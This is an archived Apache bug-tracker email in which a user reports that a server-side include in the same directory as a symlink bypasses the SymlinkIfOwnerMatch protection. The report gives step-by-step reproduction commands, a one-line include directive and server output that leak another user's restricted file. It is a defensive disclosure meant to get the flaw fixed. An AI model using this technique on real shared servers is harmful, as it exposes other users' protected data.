httpd-bugs mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From bugzi...@apache.org
Subject DO NOT REPLY [Bug 45959] SSI include ignores SymlinkIfOwnerMatch directive
Date Sat, 15 Nov 2008 03:49:34 GMT
https://issues.apache.org/bugzilla/show_bug.cgi?id=45959





--- Comment #10 from Paul B. Henson <henson@acm.org>  2008-11-14 19:49:33 PST ---
I've done some further testing, and confirmed that this is only a problem if
the included symbolic link is in the same directory as the shtml file.

Consider the following file served via apache:

$ ls -l /export/user/henson/www/

total 2-rw-------+  1 henson   csupomona      13 Nov 14 19:24 secured.html

For the sake of discussion, assume this file is readable by the web server, but
restricted to require authentication.

Now, another user creates a symbolic link to that file:

$ ls -l /export/user/astudent/www/symlink.html
lrwxrwxrwx 1 astudent csupomona 36 Nov 14 19:31
/export/user/astudent/www/symlink.html ->/export/user/henson/www/secured.html


Attempting to access the symbolic link directly fails, as SymlinkIfOwnerMatch
is configured:

$ curl http://stan.unx.csupomona.edu/~astudent/symlink.html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /~astudent/symlink.html
on this server.</p>
</body></html>


[Fri Nov 14 19:29:06 2008] [error] [client 134.71.248.140] Symbolic link
not allowed or link target not accessible:
/export/user/astudent/www/symlink.html

Now, the user creates an SSI file:

$ ls -l /export/user/astudent/www/symlink_ssi.html

-rw-r--r--+ 1 astudent csupomona 40 Nov 14 19:27
/export/user/astudent/www/symlink_ssi.shtml

Whose contents are:

$cat /export/user/astudent/www/symlink_ssi.shtml
<!--#include virtual="/~astudent/symlink.html" -->

Accessing this file:

$ curl http://stan.unx.csupomona.edu/~astudent/symlink_ssi.shtml
Secret data.

Returns the restricted data, bypassing the SymlinkIfOwnerMatch configuration
directive.

As I discovered, this appears to be a bug in ap_directory_walk. Let's say we
move the SSI file to a subdirectory:

$ ls -l /export/user/astudent/www/subdir/symlink_ssi.shtml
-rw-r--r--+  1 astudent csupomona      40 Nov 14 19:27
/export/user/astudent/www/subdir/symlink_ssi.shtml


Attempting to request it then fails as expected:

$ curl http://stan.unx.csupomona.edu/~astudent/subdir/symlink_ssi.shtml
[an error occurred while processing this directive]

[Fri Nov 14 19:37:04 2008] [error] [client 134.71.248.140] Symbolic link
not allowed or link target not accessible:
/export/user/astudent/www/symlink.html
[Fri Nov 14 19:37:04 2008] [error] [client 134.71.248.140] unable to
include "/~astudent/symlink.html" in parsed file
/export/user/astudent/www/subdir/symlink_ssi.shtml


The exact same include behaves differently depending on whether or not the
included file happens to be in the same directory as the SSI.

Again, this would appear to be a security bug to me. Not a critical one by any
means, but still a security bug. I would greatly appreciate some feedback from
a developer on this issue.


-- 
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org


Mime
View raw message